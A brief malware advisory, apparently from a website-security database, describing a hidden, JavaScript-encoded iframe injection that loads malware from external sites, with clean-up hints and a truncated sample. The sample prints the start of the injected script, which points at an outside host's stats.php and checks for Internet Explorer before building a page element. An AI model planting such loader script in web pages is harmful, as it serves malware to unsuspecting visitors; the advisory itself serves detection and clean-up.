Description:

A hidden and malicious iframe was identified. It is encoded through javascript to make it hard to identify the source.

It loads malware from multiple sources:

This is used to load malware from external web sites while not being visible to the user.

Affecting:

Any web site

Clean up:

This malware is generally hidden on .js or .php files without heavy encoding.

Malware dump (sample of malware):

var url="http://www.lifeshiftdevelopment.com/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")... f=document.createElement..